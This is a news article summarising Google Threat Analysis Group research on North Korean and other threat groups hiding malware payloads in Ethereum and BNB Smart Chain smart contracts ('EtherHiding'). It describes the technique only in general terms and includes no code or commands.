north Korean Hackers hide malware on Ethereum and BNB Smart Chain Blockchains
MOUNTAIN VIEW, CA - Nation-state hackers are increasingly leveraging the decentralized nature of blockchains too conceal and deliver malware, according to new research from Google’s Threat Analysis Group. The groups,including the North Korean-backed UNC5342,are utilizing “EtherHiding” – a technique involving storing malicious code within smart contracts on the Ethereum and BNB Smart Chain blockchains – to bypass traditional security measures.
This novel approach allows attackers to distribute malware through publicly accessible, yet difficult-to-trace, transactions. Unlike conventional infrastructure which can be shut down, blockchains offer a “bulletproof” hosting environment, making it considerably harder for security researchers and law enforcement to disrupt malicious activity. The tactic is particularly concerning given North Korea‘s escalating cybercrime operations, already responsible for stealing over $2 billion in cryptocurrency in 2025 alone, according to blockchain analysis firm Elliptic.
The infection process involves a staged deployment of malware. Initial stages, like the JadeSnow downloader used by UNC5342, retrieve later-stage payloads directly from smart contracts on the blockchains. Google researchers noted the unusual practice of UNC5342 utilizing multiple blockchains, potentially indicating compartmentalization within the hacking team. “It is indeed unusual to see a threat actor make use of multiple blockchains for EtherHiding activity; this may indicate operational compartmentalization between teams of North Korean cyber operators,” the researchers observed. “Campaigns frequently leverage EtherHiding’s flexible nature to update the infection chain and shift payload delivery locations. In one transaction, the JADESNOW downloader can switch from fetching a payload on Ethereum to fetching it on the BNB Smart Chain.This switch not only complicates analysis but also leverages lower transaction fees offered by alternate networks.”
The financially motivated group UNC5142 has also been observed employing EtherHiding. This trend highlights a growing sophistication in nation-state hacking, moving beyond traditional methods to exploit the inherent characteristics of emerging technologies like blockchain. Security experts anticipate that attackers will continue to refine these techniques, necessitating enhanced monitoring and defensive strategies focused on blockchain activity and smart contract security.
